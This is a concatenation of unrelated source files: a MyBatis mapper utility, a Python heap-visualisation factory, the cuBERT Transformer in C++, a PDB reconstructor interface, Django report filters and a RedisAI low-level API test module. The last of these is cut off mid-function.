throw new RuntimeException(e.getTargetException() != null ? e.getTargetException() : e);
}
}
protected MappedStatement copyFromMappedStatement(MappedStatement ms,
SqlSource newSqlSource, String newMsId) {
MappedStatement.Builder builder = new MappedStatement.Builder(ms.getConfiguration(), newMsId, newSqlSource, ms.getSqlCommandType());
builder.resource(ms.getResource());
builder.fetchSize(ms.getFetchSize());
builder.statementType(ms.getStatementType());
builder.keyGenerator(ms.getKeyGenerator());
// setStatementTimeout()
builder.timeout(ms.getTimeout());
// setParameterMap()
builder.parameterMap(ms.getParameterMap());
// setStatementResultMap()
List<ResultMap> resultMaps = ms.getResultMaps();
builder.resultMaps(resultMaps);
builder.resultSetType(ms.getResultSetType());
// setStatementCache()
builder.cache(ms.getCache());
builder.flushCacheRequired(ms.isFlushCacheRequired());
builder.useCache(ms.isUseCache());
return builder.build();
}
/**
     * Gets the Mapper interface class from the msId.
*
* @param msId
* @return
* @throws ClassNotFoundException
*/
public static Class<?> getMapperClass(String msId) {
String mapperClassStr = msId.substring(0, msId.lastIndexOf("."));
try {
return Class.forName(mapperClassStr);
} catch (ClassNotFoundException e) {
throw new RuntimeException("无法获取Mapper接口信息:" + msId);
}
}
/**
     * Gets the name of the executed method.
*
* @param ms
* @return
*/
public static String getMethodName(MappedStatement ms) {
return getMethodName(ms.getId());
}
/**
     * Gets the name of the executed method.
*
* @param msId
* @return
*/
public static String getMethodName(String msId) {
return msId.substring(msId.lastIndexOf(".") + 1);
}
}
| 3,784 |
423 | <gh_stars>100-1000
from typing import Any, Collection, Union
from ..constants.ignore import ignore_vars
from ..models.heap_object import HeapObject
from ..models.options import Options
from ..models.unique_identifier import UniqueIdentifier
from ..helpers.dictionary import filter_dict
from .base_heap_object_factory import HeapObjectFactory
class ClassHeapObjectFactory(HeapObjectFactory):
def __init__(self, obj: Any, options: Options = None) -> None:
super().__init__(obj, options)
self._dict = filter_dict(self._object.__dict__, ignore_vars)
def get_type(self) -> str:
return '({0}) class'.format(self.get_value())
def get_value(self) -> str:
return self._object.__name__
def get_objects_to_reduce(self) -> Union[None, Collection[Any]]:
return self._dict.values()
def create(self) -> HeapObject:
heap_obj = HeapObject(self.get_id(), self.get_type(), self.get_value(), 'kvp')
heap_obj.immutable = False
heap_obj.references = {k: UniqueIdentifier(HeapObjectFactory.get_object_id(v))
for k, v in self._dict.items()}
return heap_obj
| 445 |
486 | #include <string>
#include "cuBERT/common.h"
#include "Transformer.h"
namespace cuBERT {
template <typename T>
Transformer<T>::Transformer(void* cublas,
const std::string &var_prefix,
const std::unordered_map<std::string, T *> &var,
size_t max_batch_size,
size_t seq_length,
size_t hidden_size,
size_t num_hidden_layers,
size_t num_attention_heads,
size_t intermediate_size)
: attention_self(num_hidden_layers),
attention_output_dense(num_hidden_layers),
attention_output_norm(num_hidden_layers),
intermediate_dense(num_hidden_layers),
intermediate_act_fn(num_hidden_layers),
output_dense(num_hidden_layers),
output_layer_norm(num_hidden_layers),
attention_heads(num_hidden_layers),
attention_output(num_hidden_layers),
intermediate_output(num_hidden_layers),
layer_output(num_hidden_layers) {
this->cublas = cublas;
this->num_hidden_layers = num_hidden_layers;
this->seq_length = seq_length;
this->intermediate_size = intermediate_size;
size_t attention_head_size = hidden_size / num_attention_heads;
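        // e.g. a BERT-base-like config: hidden_size 768 with 12 heads gives attention_head_size 64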
this->attention_mask = new AttentionMask<T >(cublas, seq_length, num_attention_heads, max_batch_size);
this->neg_attention_mask_buffer = static_cast<T *>(cuBERT::malloc(sizeof(T) * max_batch_size * num_attention_heads * seq_length * seq_length));
for (int layer_idx = 0; layer_idx < num_hidden_layers; ++layer_idx) {
// buffers
this->attention_heads[layer_idx] = static_cast<T *>(cuBERT::malloc(sizeof(T) * max_batch_size * seq_length * hidden_size));
this->attention_output[layer_idx] = static_cast<T *>(cuBERT::malloc(sizeof(T) * max_batch_size * seq_length * hidden_size));
this->intermediate_output[layer_idx] = static_cast<T *>(cuBERT::malloc(sizeof(T) * max_batch_size * seq_length * intermediate_size));
this->layer_output[layer_idx] = static_cast<T *>(cuBERT::malloc(sizeof(T) * max_batch_size * seq_length * hidden_size));
attention_self[layer_idx] = new AttentionSelf<T>(cublas,
var_prefix + "/layer_" + std::to_string(layer_idx) +
"/attention/self",
var,
max_batch_size,
seq_length,
attention_heads[layer_idx],
hidden_size, num_attention_heads, attention_head_size);
T *attention_output_dense_kernel = var.at(
var_prefix + "/layer_" + std::to_string(layer_idx) + "/attention/output/dense/kernel");
T *attention_output_dense_bias = var.at(
var_prefix + "/layer_" + std::to_string(layer_idx) + "/attention/output/dense/bias");
attention_output_dense[layer_idx] = new Dense<T>(cublas,
hidden_size, hidden_size,
attention_output_dense_kernel, attention_output_dense_bias,
max_batch_size * seq_length,
gemm_algo<T>("GEMM_ALGO_ATTENTION"));
T *attention_output_norm_beta = var.at(
var_prefix + "/layer_" + std::to_string(layer_idx) + "/attention/output/LayerNorm/beta");
T *attention_output_norm_gamma = var.at(
var_prefix + "/layer_" + std::to_string(layer_idx) + "/attention/output/LayerNorm/gamma");
attention_output_norm[layer_idx] = new LayerNorm<T>(max_batch_size * seq_length, hidden_size,
attention_output_norm_beta, attention_output_norm_gamma);
// inputs = hidden_size
// units = intermediate_size
// max_batch_size = max_batch_size * seq_length
T *intermediate_dense_kernel = var.at(
var_prefix + "/layer_" + std::to_string(layer_idx) + "/intermediate/dense/kernel");
T *intermediate_dense_bias = var.at(
var_prefix + "/layer_" + std::to_string(layer_idx) + "/intermediate/dense/bias");
intermediate_dense[layer_idx] = new Dense<T>(cublas,
hidden_size, intermediate_size,
intermediate_dense_kernel, intermediate_dense_bias,
max_batch_size * seq_length,
gemm_algo<T>("GEMM_ALGO_INTERMEDIATE"));
intermediate_act_fn[layer_idx] = new GELU<T>();
// inputs = intermediate_size
// units = hidden_size
// max_batch_size = max_batch_size * seq_length
T *output_dense_kernel = var.at(
var_prefix + "/layer_" + std::to_string(layer_idx) + "/output/dense/kernel");
T *output_dense_bias = var.at(
var_prefix + "/layer_" + std::to_string(layer_idx) + "/output/dense/bias");
output_dense[layer_idx] = new Dense<T>(cublas,
intermediate_size, hidden_size,
output_dense_kernel, output_dense_bias,
max_batch_size * seq_length,
gemm_algo<T>("GEMM_ALGO_OUTPUT"));
T *output_norm_beta = var.at(
var_prefix + "/layer_" + std::to_string(layer_idx) + "/output/LayerNorm/beta");
T *output_norm_gamma = var.at(
var_prefix + "/layer_" + std::to_string(layer_idx) + "/output/LayerNorm/gamma");
output_layer_norm[layer_idx] = new LayerNorm<T>(max_batch_size * seq_length, hidden_size,
output_norm_beta, output_norm_gamma);
}
}
template <typename T>
Transformer<T>::~Transformer() {
for (int i = 0; i < num_hidden_layers; ++i) {
delete output_layer_norm[i];
delete output_dense[i];
delete intermediate_act_fn[i];
delete intermediate_dense[i];
delete attention_output_norm[i];
delete attention_output_dense[i];
delete attention_self[i];
cuBERT::free(layer_output[i]);
cuBERT::free(intermediate_output[i]);
cuBERT::free(attention_output[i]);
cuBERT::free(attention_heads[i]);
}
cuBERT::free(neg_attention_mask_buffer);
delete attention_mask;
}
template <typename T>
T *Transformer<T>::compute(size_t batch_size, T *input_gpu, int8_t *attention_mask) {
_pre_compute(batch_size);
return _in_compute(batch_size, input_gpu, attention_mask);
}
template <typename T>
void Transformer<T>::_pre_compute(size_t batch_size) {
for (int i = 0; i < num_hidden_layers; ++i) {
attention_self[i]->_pre_compute(batch_size);
attention_output_dense[i]->_pre_compute(batch_size * seq_length, attention_output[i]);
intermediate_dense[i]->_pre_compute(batch_size * seq_length, intermediate_output[i]);
output_dense[i]->_pre_compute(batch_size * seq_length, layer_output[i]);
}
}
template <typename T>
T *Transformer<T>::_in_compute(size_t batch_size, T *input_gpu, int8_t *attention_mask) {
void* stream = cuBERT::blas_get_stream(cublas);
// broadcast neg_attention_mask
this->attention_mask->compute(batch_size, attention_mask, neg_attention_mask_buffer);
T *prev_output = input_gpu;
for (int i = 0; i < num_hidden_layers; ++i) {
T *layer_input = prev_output;
// attention/self
attention_self[i]->_in_compute(batch_size, layer_input, neg_attention_mask_buffer);
// attention/output
attention_output_dense[i]->_in_compute(batch_size * seq_length, attention_heads[i], attention_output[i]);
attention_output_norm[i]->compute_(batch_size * seq_length, layer_input, attention_output[i], stream);
// intermediate
intermediate_dense[i]->_in_compute(batch_size * seq_length, attention_output[i], intermediate_output[i]);
intermediate_act_fn[i]->compute_(batch_size * seq_length * intermediate_size, intermediate_output[i], stream);
// output
output_dense[i]->_in_compute(batch_size * seq_length, intermediate_output[i], layer_output[i]);
output_layer_norm[i]->compute_(batch_size * seq_length, attention_output[i], layer_output[i], stream);
prev_output = layer_output[i];
}
return prev_output;
}
template class Transformer<float>;
#ifdef HAVE_CUDA
template class Transformer<half>;
#endif
}
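// Hedged usage sketch (added for illustration; not part of the original
// file). `encoder`, `input_gpu` and `mask` are assumed to be prepared
// elsewhere; the constructor arguments appear earlier in this file:
//
//   cuBERT::Transformer<float> *encoder = /* built from the weight map */;
//   float *input_gpu = /* device buffer: batch * seq_length * hidden_size */;
//   int8_t *mask = /* attention mask: batch * seq_length */;
//   float *out = encoder->compute(batch_size, input_gpu, mask);
//
// compute() combines _pre_compute (per-batch GEMM preparation) with
// _in_compute (the per-layer attention/intermediate/output loop) and
// returns the last layer_output buffer.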
| 5,128 |
625 | <gh_stars>100-1000
#pragma once
#include "PDB.h"
#include "UdtFieldDefinitionBase.h"
class PDBReconstructorBase
{
public:
//
// Called when reached the 'enum' type.
// If the return value is true, the enum will be expanded.
//
virtual
bool
OnEnumType(
const SYMBOL* Symbol
)
{
return false;
}
//
// Called when entering into the 'enum' type
// which will be expanded.
//
virtual
void
OnEnumTypeBegin(
const SYMBOL* Symbol
)
{
}
//
// Called when leaving from the 'enum' type.
//
virtual
void
OnEnumTypeEnd(
const SYMBOL* Symbol
)
{
}
//
	// Called for each field of the current 'enum' type.
//
virtual
void
OnEnumField(
const SYMBOL_ENUM_FIELD* EnumField
)
{
}
//
// Called when reached the UDT (struct/class/union)
// If the return value is true, the UDT will be expanded.
//
virtual
bool
OnUdt(
const SYMBOL* Symbol
)
{
return false;
}
//
// Called when entering into the UDT (struct/class/union)
// which will be expanded.
//
virtual
void
OnUdtBegin(
const SYMBOL* Symbol
)
{
}
//
// Called when leaving from the current UDT.
//
virtual
void
OnUdtEnd(
const SYMBOL* Symbol
)
{
}
//
// Called when entering into the field of the current UDT.
//
virtual
void
OnUdtFieldBegin(
const SYMBOL_UDT_FIELD* UdtField
)
{
}
//
// Called when leaving from the field of the current UDT.
//
virtual
void
OnUdtFieldEnd(
const SYMBOL_UDT_FIELD* UdtField
)
{
}
//
// Called for each field in the current UDT.
//
virtual
void
OnUdtField(
const SYMBOL_UDT_FIELD* UdtField,
UdtFieldDefinitionBase* MemberDefinition
)
{
}
//
// Called when entering into the nested anonymous UDT (struct/class/union)
// which will be expanded.
//
virtual
void
OnAnonymousUdtBegin(
UdtKind Kind,
const SYMBOL_UDT_FIELD* FirstUdtField
)
{
}
//
// Called when leaving from the current nested anonymous UDT.
//
virtual
void
OnAnonymousUdtEnd(
UdtKind Kind,
const SYMBOL_UDT_FIELD* FirstUdtField,
const SYMBOL_UDT_FIELD* LastUdtField,
DWORD Size
)
{
}
//
// Called when entering the bitfield.
//
virtual
void
OnUdtFieldBitFieldBegin(
const SYMBOL_UDT_FIELD* FirstUdtFieldBitField,
const SYMBOL_UDT_FIELD* LastUdtFieldBitField
)
{
}
//
// Called when leaving the bitfield.
//
virtual
void
OnUdtFieldBitFieldEnd(
const SYMBOL_UDT_FIELD* FirstUdtFieldBitField,
const SYMBOL_UDT_FIELD* LastUdtFieldBitField
)
{
}
//
// Called when a padding member should be created.
//
virtual
void
OnPaddingMember(
const SYMBOL_UDT_FIELD* UdtField,
BasicType PaddingBasicType,
DWORD PaddingBasicTypeSize,
DWORD PaddingSize
)
{
}
//
// Called when a padding bitfield field should be created.
//
virtual
void
OnPaddingBitFieldField(
const SYMBOL_UDT_FIELD* UdtField,
const SYMBOL_UDT_FIELD* PreviousUdtField
)
{
}
};
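//
// A hedged example subclass (added for illustration, not part of the original
// header): a minimal reconstructor that only counts the UDTs it is offered,
// relying solely on the virtual interface declared above.
//
class CountingPDBReconstructor : public PDBReconstructorBase
{
public:
	int UdtCount = 0;
	bool
	OnUdt(
		const SYMBOL* Symbol
		) override
	{
		UdtCount += 1;
		return false; // count only, never expand
	}
};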
| 1,362 |
471 | from django.template.loader import render_to_string
# For translations
from django.utils.translation import ugettext_noop
import pytz
from memoized import memoized
from corehq.apps.hqwebapp.crispy import CSS_FIELD_CLASS, CSS_LABEL_CLASS
class BaseReportFilter(object):
"""
For filtering the results of CommCare HQ Reports.
slug => the parameter you get back from the request
template => the template to render this filter
label => the filter's label
"""
slug = None
template = None
label = None
css_class = "span4"
help_text = None
is_cacheable = False
help_style_bubble = False
def __init__(self, request, domain=None, timezone=pytz.utc, parent_report=None,
css_label=None, css_field=None):
self.domain = domain
if self.slug is None:
raise NotImplementedError("slug is required")
if self.template is None:
raise NotImplementedError("a template must be specified")
if self.label is None:
raise NotImplementedError("label is required")
self.request = request
self.timezone = timezone
self.parent_report = parent_report
self.css_label = css_label or (CSS_LABEL_CLASS + ' control-label')
self.css_field = css_field or CSS_FIELD_CLASS
self.context = {}
@property
def is_disabled(self):
"""
If necessary, determine whether to show this filter based on the results of surrounding (related) filters.
"""
return False
@property
def filter_context(self):
"""
Context for rendering the filter.
Should return a dict.
"""
raise NotImplementedError("filter_context must be overridden")
def render(self):
if self.is_disabled:
return ""
self.context.update({
'slug': self.slug,
'label': self.label,
'css_id': 'report_filter_%s' % self.slug,
'css_class': self.css_class,
'css_label_class': self.css_label,
'css_field_class': self.css_field,
'help_text': self.help_text,
'help_style_bubble': self.help_style_bubble,
})
filter_context = self.filter_context
        if not isinstance(filter_context, dict):
            raise ValueError("filter_context must return a dict.")
self.context.update(filter_context)
return render_to_string(self.template, self.context)
@classmethod
def get_value(cls, request, domain):
return request.GET.get(cls.slug)
class CheckboxFilter(BaseReportFilter):
slug = "checkbox"
label = "hello"
template = "reports/filters/checkbox.html"
@property
def filter_context(self):
return {'checked': self.request.GET.get(self.slug, False)}
@classmethod
def get_value(cls, request, domain):
val = request.GET.get(cls.slug, False)
if not val:
return False
else:
return val is True or val == 'True' or val == 'true'
class BaseSingleOptionFilter(BaseReportFilter):
"""
Displays a select field.
"""
template = "reports/filters/single_option.html"
default_text = ugettext_noop("Filter by...")
placeholder = ''
is_paginated = False
pagination_source = None # url for paginated data
async_handler = None
async_action = None
@property
def options(self):
"""
Options should return a list of tuples formatted like:
[('value', 'display_text')]
"""
raise NotImplementedError("options must be overridden")
@property
@memoized
def selected(self):
return self.get_value(self.request, self.domain) or ""
@property
def filter_context(self):
options = []
if not self.is_paginated:
options = self.options
            if not isinstance(options, list) or any(
                not (isinstance(op, tuple) and len(op) == 2) for op in options
            ):
                raise ValueError("options must return a list of option tuples [('value','text')].")
            options = [{'val': val, 'text': text} for val, text in options]
return {
'select': {
'options': options,
'default_text': self.default_text,
'selected': self.selected,
'placeholder': self.placeholder,
},
'pagination': {
'enabled': self.is_paginated,
'url': self.pagination_source,
'handler': self.async_handler.slug if self.async_handler else '',
'action': self.async_action,
},
}
@classmethod
def get_value(cls, request, domain):
value = super(BaseSingleOptionFilter, cls).get_value(request, domain)
if cls.is_paginated:
return value if value else None
        # get_value is a classmethod, so build an instance to read options from.
        instance = cls(request, domain)
valid_options = [op[0] for op in instance.options]
if value in valid_options:
return value
return None
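# A hedged sketch of a concrete single-option filter built on the class above
# (added for illustration): the slug, label, and option values are invented
# and do not exist elsewhere in this module.
class StatusFilter(BaseSingleOptionFilter):
    slug = "status"
    label = ugettext_noop("Status")
    default_text = ugettext_noop("All statuses")
    @property
    def options(self):
        return [("open", "Open"), ("closed", "Closed")]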
class BaseMultipleOptionFilter(BaseSingleOptionFilter):
"""
Displays a multiselect field.
"""
template = "reports/filters/multi_option.html"
default_options = [] # specify a list
@classmethod
def get_value(cls, request, domain):
return request.GET.getlist(cls.slug)
@property
@memoized
def selected(self):
return self.get_value(self.request, self.domain) or self.default_options
class BaseDrilldownOptionFilter(BaseReportFilter):
"""
Displays multiple select fields that display in a hierarchial order and drill down to one value.
Ex:
Select Application: <applications>
---> Select Module: <module options based on selected application (if selected)>
---------> Select Form: <form_options based on selected module (if selected)>
use_only_last => Whether to indicate to the user that they must move all the way through the hierarchy
and select a final option before the result is usable. For example, you can't just pick an application
and show all of its forms, you must select exactly one form.
"""
template = "reports/filters/drilldown_options.html"
use_only_last = False
drilldown_empty_text = ugettext_noop("No Data Available")
is_cacheable = True
@property
def drilldown_map(self):
"""
Should return a structure like:
[{
'val': <value>,
'text': <text>,
'next': [
{
'val': <value>,
'text' <text>,
'next': [...]
},
{...}
]
},
{...}
]
"""
raise NotImplementedError("drilldown_map must be implemented")
@classmethod
def get_labels(cls):
"""
Returns a list of ('label', default text/caption', 'slug') tuples.
ex: [
('Application', 'Select Application...', 'app'),
('Module', 'Select Module...', 'module'),
('Form', 'Select Form...', 'form')
]
"""
raise NotImplementedError("get_labels must be implemented")
@property
def selected(self):
selected = []
for label in self.rendered_labels:
value = self._get_label_value(self.request, label)
if not value['value']:
break
selected.append(value['value'])
return selected
@property
def rendered_labels(self):
"""
Modify the default set of labels here.
"""
return self.get_labels()
@property
def filter_context(self):
controls = []
for level, label in enumerate(self.rendered_labels):
controls.append({
'label': label[0],
'default_text': label[1],
'slug': label[2],
'level': level,
})
drilldown_map = list(self.drilldown_map)
return {
'option_map': drilldown_map,
'controls': controls,
'selected': self.selected,
'use_last': self.use_only_last,
'notifications': self.final_notifications,
'empty_text': self.drilldown_empty_text,
'is_empty': not drilldown_map,
}
@property
def final_notifications(self):
"""
Not required, but this can be used to display a message when the drill down is complete
that's based on the value of the final drill down option.
ex: {'xmlns_of_form': 'This form does not have a unique id.'}
"""
return {}
@property
@memoized
def GET_values(self):
values = []
for label in self.rendered_labels:
value = self._get_label_value(self.request, label)
if not value['value']:
break
values.append(value)
return values
def _map_structure(self, val, text, next=None):
if next is None:
next = []
return {
'val': val,
'text': text,
'next': next,
}
@property
def shared_pagination_GET_params(self):
return [dict(name='%s_%s' % (self.slug, val['slug']), value=val['value']) for val in self.GET_values]
@classmethod
def _get_label_value(cls, request, label):
slug = str(label[2])
val = request.GET.get('%s_%s' % (cls.slug, slug))
return {
'slug': slug,
'value': val,
}
@classmethod
def get_value(cls, request, domain):
instance = cls(request, domain)
return instance.GET_values, instance
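# A hedged sketch of a concrete drilldown filter following the
# Application -> Module -> Form example in the docstrings above (added for
# illustration): all values are static and invented, not real application data.
class FormDrilldownFilter(BaseDrilldownOptionFilter):
    slug = "form"
    label = ugettext_noop("Form")
    @classmethod
    def get_labels(cls):
        return [
            ('Application', 'Select Application...', 'app'),
            ('Module', 'Select Module...', 'module'),
            ('Form', 'Select Form...', 'form'),
        ]
    @property
    def drilldown_map(self):
        return [
            self._map_structure('app1', 'Demo Application', [
                self._map_structure('m0', 'Module 0', [
                    self._map_structure('f0', 'Registration Form'),
                ]),
            ]),
        ]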
class BaseTagsFilter(BaseReportFilter):
template = "reports/filters/base_tags_filter.html"
    tags = []
    placeholder = ''  # referenced in filter_context below; default to empty
@property
def selected(self):
return self.get_value(self.request, self.domain) or ''
@property
def filter_context(self):
return {
'tags': self.tags,
'selected': self.selected,
'placeholder': self.placeholder,
}
class BaseSimpleFilter(BaseReportFilter):
template = "reports/filters/simple.html"
slug = None
# use ugettext_lazy for below properties
label = None
help_title = None
help_content = None
help_inline = None
@property
def filter_context(self):
return {
'default': self.request.GET.get(self.slug, ""),
'help_title': self.help_title,
'help_content': self.help_content,
'help_inline': self.help_inline
}
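# A hedged sketch of a concrete simple filter (added for illustration); the
# slug and label values are invented, and real filters would wrap the strings
# in ugettext_lazy per the note above.
class SearchFilter(BaseSimpleFilter):
    slug = "search"
    label = "Search"
    help_title = "Search help"
    help_content = "Filter results by a free-text term."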
| 4,943 |
652 | <gh_stars>100-1000
#define REDISMODULE_MAIN
#include "DAG_utils.h"
#include <errno.h>
#include <string.h>
typedef enum LLAPI_status {
LLAPI_RUN_NONE = 0,
LLAPI_RUN_SUCCESS,
LLAPI_RUN_ERROR,
LLAPI_NUM_OUTPUTS_ERROR
} LLAPI_status;
pthread_mutex_t global_lock = PTHREAD_MUTEX_INITIALIZER;
pthread_cond_t global_cond = PTHREAD_COND_INITIALIZER;
int RAI_llapi_basic_check(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
REDISMODULE_NOT_USED(argv);
if (argc > 1) {
RedisModule_WrongArity(ctx);
return REDISMODULE_OK;
}
RAI_Error *err;
RedisAI_InitError(&err);
    if (RedisAI_GetErrorCode(err) == RedisAI_ErrorCode_OK) {
        RedisModule_ReplyWithSimpleString(ctx, "OK");
    } else {
        RedisModule_ReplyWithError(ctx, "ERROR");
    }
RedisAI_FreeError(err);
return REDISMODULE_OK;
}
static void _ScriptFinishFunc(RAI_OnFinishCtx *onFinishCtx, void *private_data) {
RAI_Error *err;
if (RedisAI_InitError(&err) != REDISMODULE_OK)
goto finish;
RAI_ScriptRunCtx *sctx = RedisAI_GetAsScriptRunCtx(onFinishCtx, err);
if (RedisAI_GetErrorCode(err) != RedisAI_ErrorCode_OK) {
*(int *)private_data = LLAPI_RUN_ERROR;
goto finish;
}
if (RedisAI_ScriptRunCtxNumOutputs(sctx) != 1) {
*(int *)private_data = LLAPI_NUM_OUTPUTS_ERROR;
goto finish;
}
RAI_Tensor *tensor = RedisAI_ScriptRunCtxOutputTensor(sctx, 0);
    double expected[4] = {4, 6, 4, 6};
double val[4];
// Verify that we received the expected tensor at the end of the run.
for (long long i = 0; i < 4; i++) {
if (!RedisAI_TensorGetValueAsDouble(tensor, i, &val[i])) {
goto finish;
}
        if (expected[i] != val[i]) {
goto finish;
}
}
*(int *)private_data = LLAPI_RUN_SUCCESS;
finish:
RedisAI_FreeError(err);
pthread_mutex_lock(&global_lock);
pthread_cond_signal(&global_cond);
pthread_mutex_unlock(&global_lock);
}
static void _ModelFinishFunc(RAI_OnFinishCtx *onFinishCtx, void *private_data) {
RAI_Error *err;
if (RedisAI_InitError(&err) != REDISMODULE_OK)
goto finish;
RAI_ModelRunCtx *mctx = RedisAI_GetAsModelRunCtx(onFinishCtx, err);
if (RedisAI_GetErrorCode(err) != RedisAI_ErrorCode_OK) {
*(int *)private_data = LLAPI_RUN_ERROR;
goto finish;
}
if (RedisAI_ModelRunCtxNumOutputs(mctx) != 1) {
*(int *)private_data = LLAPI_NUM_OUTPUTS_ERROR;
goto finish;
}
RAI_Tensor *tensor = RedisAI_ModelRunCtxOutputTensor(mctx, 0);
    double expected[4] = {4, 9, 4, 9};
double val[4];
// Verify that we received the expected tensor at the end of the run.
for (long long i = 0; i < 4; i++) {
if (!RedisAI_TensorGetValueAsDouble(tensor, i, &val[i])) {
goto finish;
}
        if (expected[i] != val[i]) {
goto finish;
}
}
*(int *)private_data = LLAPI_RUN_SUCCESS;
finish:
RedisAI_FreeError(err);
pthread_mutex_lock(&global_lock);
pthread_cond_signal(&global_cond);
pthread_mutex_unlock(&global_lock);
}
static int _ExecuteModelRunAsync(RedisModuleCtx *ctx, RAI_ModelRunCtx *mctx) {
LLAPI_status status = LLAPI_RUN_NONE;
pthread_mutex_lock(&global_lock);
if (RedisAI_ModelRunAsync(mctx, _ModelFinishFunc, &status) != REDISMODULE_OK) {
pthread_mutex_unlock(&global_lock);
RedisAI_ModelRunCtxFree(mctx);
RedisModule_ReplyWithError(ctx, "Async run could not start");
return LLAPI_RUN_NONE;
}
// Wait until the onFinish callback returns.
pthread_cond_wait(&global_cond, &global_lock);
pthread_mutex_unlock(&global_lock);
RedisAI_ModelRunCtxFree(mctx);
return status;
}
static int _ExecuteScriptRunAsync(RedisModuleCtx *ctx, RAI_ScriptRunCtx *sctx) {
LLAPI_status status = LLAPI_RUN_NONE;
pthread_mutex_lock(&global_lock);
if (RedisAI_ScriptRunAsync(sctx, _ScriptFinishFunc, &status) != REDISMODULE_OK) {
pthread_mutex_unlock(&global_lock);
RedisAI_ScriptRunCtxFree(sctx);
RedisModule_ReplyWithError(ctx, "Async run could not start");
return LLAPI_RUN_NONE;
}
// Wait until the onFinish callback returns.
pthread_cond_wait(&global_cond, &global_lock);
pthread_mutex_unlock(&global_lock);
RedisAI_ScriptRunCtxFree(sctx);
return status;
}
int RAI_llapi_modelRun(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
REDISMODULE_NOT_USED(argv);
if (argc > 1) {
RedisModule_WrongArity(ctx);
return REDISMODULE_OK;
}
// The model m{1} should exist in key space.
const char *keyNameStr = "m{1}";
RedisModuleString *keyRedisStr = RedisModule_CreateString(ctx, keyNameStr, strlen(keyNameStr));
RedisModuleKey *key = RedisModule_OpenKey(ctx, keyRedisStr, REDISMODULE_READ);
RAI_Model *model = RedisModule_ModuleTypeGetValue(key);
RAI_ModelRunCtx *mctx = RedisAI_ModelRunCtxCreate(model);
RedisModule_FreeString(ctx, keyRedisStr);
RedisModule_CloseKey(key);
// Test the case of a failure in the model run execution (no inputs specified).
if (_ExecuteModelRunAsync(ctx, mctx) != LLAPI_RUN_ERROR) {
return RedisModule_ReplyWithSimpleString(ctx, "Async run should end with an error");
}
mctx = RedisAI_ModelRunCtxCreate(model);
// The tensors a{1} and b{1} should exist in key space.
// Load the tensors a{1} and b{1} and add them as inputs for m{1}.
keyNameStr = "a{1}";
keyRedisStr = RedisModule_CreateString(ctx, keyNameStr, strlen(keyNameStr));
key = RedisModule_OpenKey(ctx, keyRedisStr, REDISMODULE_READ);
RAI_Tensor *input1 = RedisModule_ModuleTypeGetValue(key);
RedisAI_ModelRunCtxAddInput(mctx, "a", input1);
RedisModule_FreeString(ctx, keyRedisStr);
RedisModule_CloseKey(key);
keyNameStr = "b{1}";
keyRedisStr = RedisModule_CreateString(ctx, keyNameStr, strlen(keyNameStr));
key = RedisModule_OpenKey(ctx, keyRedisStr, REDISMODULE_READ);
RAI_Tensor *input2 = RedisModule_ModuleTypeGetValue(key);
RedisAI_ModelRunCtxAddInput(mctx, "b", input2);
RedisModule_FreeString(ctx, keyRedisStr);
RedisModule_CloseKey(key);
// Add the expected output tensor.
RedisAI_ModelRunCtxAddOutput(mctx, "mul");
if (_ExecuteModelRunAsync(ctx, mctx) != LLAPI_RUN_SUCCESS)
return RedisModule_ReplyWithSimpleString(ctx, "Async run failed");
return RedisModule_ReplyWithSimpleString(ctx, "Async run success");
}
int RAI_llapi_scriptRun(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
REDISMODULE_NOT_USED(argv);
if (argc > 1) {
RedisModule_WrongArity(ctx);
return REDISMODULE_OK;
}
// The script 'myscript{1}' should exist in key space.
const char *keyNameStr = "myscript{1}";
RedisModuleString *keyRedisStr = RedisModule_CreateString(ctx, keyNameStr, strlen(keyNameStr));
RedisModuleKey *key = RedisModule_OpenKey(ctx, keyRedisStr, REDISMODULE_READ);
RAI_Script *script = RedisModule_ModuleTypeGetValue(key);
RAI_ScriptRunCtx *sctx = RedisAI_ScriptRunCtxCreate(script, "bad_func");
RedisModule_FreeString(ctx, keyRedisStr);
RedisModule_CloseKey(key);
// Test the case of a failure in the script run execution (func name does not exist in script).
if (_ExecuteScriptRunAsync(ctx, sctx) != LLAPI_RUN_ERROR) {
return RedisModule_ReplyWithSimpleString(ctx, "Async run should end with an error");
}
sctx = RedisAI_ScriptRunCtxCreate(script, "bar");
// The tensors a{1} and b{1} should exist in key space.
// Load the tensors a{1} and b{1} and add them as inputs for the script.
keyNameStr = "a{1}";
keyRedisStr = RedisModule_CreateString(ctx, keyNameStr, strlen(keyNameStr));
key = RedisModule_OpenKey(ctx, keyRedisStr, REDISMODULE_READ);
RAI_Tensor *input1 = RedisModule_ModuleTypeGetValue(key);
RedisAI_ScriptRunCtxAddTensorInput(sctx, input1);
RedisModule_FreeString(ctx, keyRedisStr);
RedisModule_CloseKey(key);
keyNameStr = "b{1}";
keyRedisStr = RedisModule_CreateString(ctx, keyNameStr, strlen(keyNameStr));
key = RedisModule_OpenKey(ctx, keyRedisStr, REDISMODULE_READ);
RAI_Tensor *input2 = RedisModule_ModuleTypeGetValue(key);
RedisAI_ScriptRunCtxAddTensorInput(sctx, input2);
RedisModule_FreeString(ctx, keyRedisStr);
RedisModule_CloseKey(key);
// Add the expected output tensor.
RedisAI_ScriptRunCtxAddOutput(sctx);
if (_ExecuteScriptRunAsync(ctx, sctx) != LLAPI_RUN_SUCCESS)
return RedisModule_ReplyWithSimpleString(ctx, "Async run failed");
return RedisModule_ReplyWithSimpleString(ctx, "Async run success");
}
int RAI_llapi_DAGRun(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
REDISMODULE_NOT_USED(argv);
if (argc > 1) {
RedisModule_WrongArity(ctx);
return REDISMODULE_OK;
}
// Test the case a successful and failure tensor load input to DAG.
if (testLoadTensor(ctx) != LLAPIMODULE_OK) {
return RedisModule_ReplyWithSimpleString(ctx, "LOAD tensor test failed");
}
// Test the case of a failure due to addition of a non compatible MODELRUN op.
if (testModelRunOpError(ctx) != LLAPIMODULE_OK) {
return RedisModule_ReplyWithSimpleString(ctx, "MODELRUN op error test failed");
}
// Test the case of a failure due an empty DAG.
if (testEmptyDAGError(ctx) != LLAPIMODULE_OK) {
return RedisModule_ReplyWithSimpleString(ctx, "DAG keys mismatch error test failed");
}
// Test the case of a failure due to an op within a DAG whose inkey does not exist in the DAG.
if (testKeysMismatchError(ctx) != LLAPIMODULE_OK) {
return RedisModule_ReplyWithSimpleString(ctx, "DAG keys mismatch error test failed");
}
